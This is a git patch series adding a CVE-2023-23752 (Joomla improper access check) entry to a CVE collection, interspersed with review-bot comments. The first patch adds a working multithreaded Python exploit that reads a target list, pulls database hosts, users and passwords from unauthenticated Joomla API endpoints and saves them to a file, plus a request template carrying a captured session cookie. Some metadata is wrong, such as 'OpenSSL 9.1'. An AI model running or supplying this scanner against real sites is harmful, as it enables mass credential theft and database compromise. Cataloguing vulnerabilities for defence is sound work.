From 84317197629ad5e16272b1cf0a45bec071a5b81a Mon Sep 17 00:00:00 2001
From: maoran
Date: Wed, 15 Mar 2023 15:48:42 +0800
Subject: [PATCH 1/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../2023/CVE-2023-23752/CVE-2023-25136.py | 41 +++++++++++++++++++
cve/openssl/2023/CVE-2023-23752/README.md | 14 +++++++
cve/openssl/2023/yaml/CVE-2023-23752.yaml | 40 ++++++++++++++++++
openkylin_list.yaml | 1 +
4 files changed, 96 insertions(+)
create mode 100644 cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
create mode 100644 cve/openssl/2023/CVE-2023-23752/README.md
create mode 100644 cve/openssl/2023/yaml/CVE-2023-23752.yaml
diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
new file mode 100644
index 00000000..59ef149d
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
@@ -0,0 +1,41 @@
+#An issue was discovered in Joomla! 4.0.0 through
+#4.2.7. An improper access check allows
+#unauthorized access to webservice endpoints.
+import requests,time,re,random,os,sys,json
+from multiprocessing.dummy import Pool as ThreadPool
+from colorama import Fore,Style, init
+init(autoreset=True)
+
+r = Fore.RED + Style.BRIGHT
+g = Fore.GREEN + Style.BRIGHT
+c = Fore.CYAN + Style.BRIGHT
+y = Fore.YELLOW + Style.BRIGHT
+o = Fore.RESET + Style.RESET_ALL
+
+
+def jomprv(url):
+ try:
+ headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/101.0.4951.61 Mobile Safari/537.36'}
+ asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
+ if 'dbtype' in asw.content:
+ hoset = re.findall('"host":"(.*?)"',asw.content)[0]
+ debst = re.findall('"db":"(.*?)"',asw.content)[0]
+ uset = re.findall('"user":"(.*?)"',asw.content)[0]
+ paset = re.findall('"password":"(.*?)"',asw.content)[0]
+ print ("Domaij" + " : " + url)
+ print (g + "HOST" + " : " + hoset)
+ print (g + "DB" + " : " + debst)
+ print (g + "User" + " : " + uset)
+ print (g + "Pass" + " : " + paset)
+ open('res.txt', 'a').write('\n!== Results Joomla CVE-2023-23752 ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
+ else:
+ print(r+ 'BAD' + ' ' + url)
+ #for res in regex:
+ except:
+ pass
+print "{}JOOMLA! CVE-2023-23752 | Shin Code\n".format(y)
+url = open(raw_input(o+'List:~# '),'r').read().splitlines()
+pool = ThreadPool(int(30))
+pool.map(jomprv, url)
+pool.close()
+pool.join()
\ No newline at end of file
diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/openssl/2023/CVE-2023-23752/README.md
new file mode 100644
index 00000000..f6c41690
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-23752/README.md
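Review bot: `jomprv` prints the recovered database password and appends it in cleartext to `res.txt` in the working directory, so every run of this PoC leaves live credentials on disk and in terminal scrollback. For a verification script it is enough to report that the endpoint answered without authentication; I would drop the `open('res.txt', 'a').write(...)` line and mask the secret, e.g. `print (g + "Pass" + " : " + "<redacted>")`. The bare `except: pass` around the whole body also hides timeouts and parse failures, so a host that could not be checked looks the same as one that was never tried; catching the request error and printing the URL would make a run auditable. The file is Python 2 only (`print` statement, `raw_input`), which deserves a comment at the top, since the existing header comment only describes the CVE.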
@@ -0,0 +1,14 @@
+# Joomla-CVE-2023-23752
+python 2.7
+
+Buy Coffee :
+
+Bitcoin $: 31mtLHqhaXXyCMnT2EU73U8fwYwigiEEU1
+
+Perfect Money $: U22270614
+
+Saweria $: https://saweria.co/Shin403
+
+Trakteer $: https://trakteer.id/shin403
+
+![Screenshot_2023-03-11-18-20-57-172-edit_com termux](https://user-images.githubusercontent.com/59664965/224481416-8fd859c7-ecb3-40e9-9730-2187b2ca388a.jpg)
diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/openssl/2023/yaml/CVE-2023-23752.yaml
new file mode 100644
index 00000000..a8187499
--- /dev/null
+++ b/cve/openssl/2023/yaml/CVE-2023-23752.yaml
@@ -0,0 +1,40 @@
+id: CVE-2023-23752
+
+info:
+ name: CVE-2023-23752-joomla
+ author: hakimi
+ severity: high
+ description: description
+ reference:
+ - https://cve.report/CVE-2023-23752
+ tags: CVE-2023-23752
+
+requests:
+ - raw:
+ - |+
+ GET /api/index.php/v1/config/application?public=true HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+ Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
+ Connection: close
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "links"
+ - '"password":'
+
+ - type: word
+ part: body
+ words:
+ - "attributes"
+
+ - type: status
+ status:
+ - 200
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 897401df..bb775b10 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -80,6 +80,7 @@ cve:
 - CVE-2023-25136
 - CVE-2021-3449
 - CVE-2022-0778
+ - CVE-2023-23752
 libxml2:
 - CVE-2020-24977
 - CVE-2021-3517
-- Gitee
From dd03178f85cae4f894ffca01905abd5957e5998e Mon Sep 17 00:00:00 2001
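Review bot: The raw request in the new `yaml/CVE-2023-23752.yaml` template ships a hard-coded `Cookie:` header that looks like a session cookie captured when the request was recorded. The check targets an endpoint that is meant to be reachable without authentication, so the header is unnecessary, and it commits someone's session identifier to the repository; I would delete the `Cookie:` line (and the browser-only `Cache-Control` / `Upgrade-Insecure-Requests` lines with it). `description: description` is still a placeholder and should carry the one-line summary already used in the script header, and `severity: high` should be checked against the scoring the project uses for this CVE.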
From: maoran Date: Wed, 15 Mar 2023 17:56:47 +0800 Subject: [PATCH 2/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-23752/CVE-2023-23752.py} | 0 cve/{openssl => joomla}/2023/CVE-2023-23752/README.md | 0 cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml | 0 openkylin_list.yaml | 2 ++ 4 files changed, 2 insertions(+) rename cve/{openssl/2023/CVE-2023-23752/CVE-2023-25136.py => joomla/2023/CVE-2023-23752/CVE-2023-23752.py} (100%) rename cve/{openssl => joomla}/2023/CVE-2023-23752/README.md (100%) rename cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml (100%) diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py similarity index 100% rename from cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py rename to cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/joomla/2023/CVE-2023-23752/README.md similarity index 100% rename from cve/openssl/2023/CVE-2023-23752/README.md rename to cve/joomla/2023/CVE-2023-23752/README.md diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml similarity index 100% rename from cve/openssl/2023/yaml/CVE-2023-23752.yaml rename to cve/joomla/2023/yaml/CVE-2023-23752.yaml diff --git a/openkylin_list.yaml b/openkylin_list.yaml index bb775b10..35e701bc 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -79,7 +79,9 @@ cve: - CVE-2022-3602 - CVE-2023-25136 - CVE-2021-3449 + joomla: - CVE-2022-0778 + - CVE-2023-23752 libxml2: - CVE-2020-24977 -- Gitee From c98a96e0ebbd70a623ad4e62aeee430d81cd76dd Mon Sep 17 00:00:00 2001 
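Review bot: In the `openkylin_list.yaml` hunk the new `joomla:` key is inserted above the existing `- CVE-2022-0778` line, so that entry now falls under the `joomla` group instead of the group it was listed in before. It previously sat in the same run as `CVE-2022-3602` and `CVE-2021-3449`, which suggests it belongs to the preceding component, not to Joomla; the key should go directly above the added entry, i.e. `- CVE-2022-0778`, then `joomla:`, then `- CVE-2023-23752`. The later hunk in this series that adds `- CVE-2022-3786` under `joomla:` has the same placement problem. The name of the preceding group is outside the hunk, so confirm it against the full file.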
From: lavendes44
Date: Tue, 21 Mar 2023 08:56:56 +0000
Subject: [PATCH 3/7] update cve/joomla/2023/yaml/CVE-2023-23752.yaml.
---
cve/joomla/2023/yaml/CVE-2023-23752.yaml | 54 ++++++++----------------
1 file changed, 18 insertions(+), 36 deletions(-)
diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml
index a8187499..01104ac9 100644
--- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml
+++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml
@@ -1,40 +1,22 @@
 id: CVE-2023-23752
-
+source:
+ https://github.com/Jenderal92/Joomla-CVE-2023-23752
 info:
 name: CVE-2023-23752-joomla
- author: hakimi
- severity: high
- description: description
+ severity: medium
+ description:
+ 在Joomla!4.0.0至4.2.7中发现一个问题。一个不恰当的访问检查允许未经授权访问网络服务端点。
+ scope-of-influence:
+ Joomla! 4.0.0 through 4.2.7
+ OpenSSL 9.1
 reference:
- - https://cve.report/CVE-2023-23752
- tags: CVE-2023-23752
-
-requests:
- - raw:
- - |+
- GET /api/index.php/v1/config/application?public=true HTTP/1.1
- Host: {{Hostname}}
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
- Connection: close
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "links"
- - '"password":'
-
- - type: word
- part: body
- words:
- - "attributes"
-
- - type: status
- status:
- - 200
+ - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2023-23752
+ cwe-id: NVD-CWE-Other
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 非法访问
\ No newline at end of file
-- Gitee
From 5b59893063e5b474a13265268cae152141159d33 Mon Sep 17 00:00:00 2001
From: lavendes44
Date: Tue, 21 Mar 2023 08:59:24 +0000
Subject: [PATCH 4/7] update openkylin_list.yaml.
Signed-off-by: lavendes44
---
openkylin_list.yaml | 1 -
1 file changed, 1 deletion(-)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 35e701bc..67b6e2b3 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
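Review bot: The new `scope-of-influence` value lists `OpenSSL 9.1` under `Joomla! 4.0.0 through 4.2.7`, and nothing else in this entry concerns OpenSSL, so it reads as a leftover from another record. Because the two lines form a plain multi-line scalar they fold into a single string, which makes the stray product look like part of the affected range; drop the line or turn the field into a list with one item per product. The rewrite also removes the request and matchers, the only detection logic the file had, without recording what to do about a finding: a line naming the fixed release from the linked Joomla advisory would let a reader act on the entry.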
@@ -81,7 +81,6 @@ cve: - CVE-2021-3449 joomla: - CVE-2022-0778 - - CVE-2023-23752 libxml2: - CVE-2020-24977 -- Gitee From 4483722c0781db37a7ace51909bae478410d9c71 Mon Sep 17 00:00:00 2001 From: lavendes44 Date: Tue, 21 Mar 2023 09:03:41 +0000 Subject: [PATCH 5/7] update cve/joomla/2023/yaml/CVE-2023-23752.yaml. Signed-off-by: lavendes44 --- cve/joomla/2023/yaml/CVE-2023-23752.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml index 01104ac9..40166d53 100644 --- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml @@ -2,20 +2,19 @@ id: CVE-2023-23752 source: https://github.com/Jenderal92/Joomla-CVE-2023-23752 info: - name: CVE-2023-23752-joomla + name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 severity: medium description: 在Joomla!4.0.0至4.2.7中发现一个问题。一个不恰当的访问检查允许未经授权访问网络服务端点。 scope-of-influence: Joomla! 4.0.0 through 4.2.7 - OpenSSL 9.1 reference: - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - cwe-id: NVD-CWE-Other + cwe-id: None cnvd-id: None kve-id: None tags: -- Gitee From 72bb8c9d5ae94a357c56183bc556e19ea6ae2a80 Mon Sep 17 00:00:00 2001 From: lavendes44 Date: Tue, 21 Mar 2023 09:05:08 +0000 Subject: [PATCH 6/7] update openkylin_list.yaml. --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 80cfbfc3..296bf60c 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -115,6 +115,7 @@ cve: - CVE-2021-3449 joomla: - CVE-2022-0778 + - CVE-2022-3786 - CVE-2023-23752 libxml2: - CVE-2020-24977 -- Gitee 
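Review bot: In the `CVE-2023-23752.yaml` hunk, `info.name` now holds a paragraph describing the Joomla! product instead of a label for the vulnerability, so anything that lists entries by `name` loses the identifier the previous value `CVE-2023-23752-joomla` gave it; keep a short name and move the product text into `description` or a field of its own. The same hunk changes `cwe-id: NVD-CWE-Other` to `cwe-id: None`, which YAML loads as the string `None` rather than a null and discards the only weakness classification the entry carried. If no specific CWE applies, leaving `NVD-CWE-Other` is the more informative value. The file continues past `tags:` outside the hunk.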
From b575c9d13f152a241440c58fdbca5d285e748ae7 Mon Sep 17 00:00:00 2001
From: lavendes44
Date: Tue, 21 Mar 2023 11:01:15 +0000
Subject: [PATCH 7/7] update openkylin_list.yaml.
---
openkylin_list.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 296bf60c..83d154a9 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -113,9 +113,9 @@ cve:
 - CVE-2022-3602
 - CVE-2023-25136
 - CVE-2021-3449
- joomla:
 - CVE-2022-0778
 - CVE-2022-3786
+ joomla:
 - CVE-2023-23752
 libxml2:
 - CVE-2020-24977
-- Gitee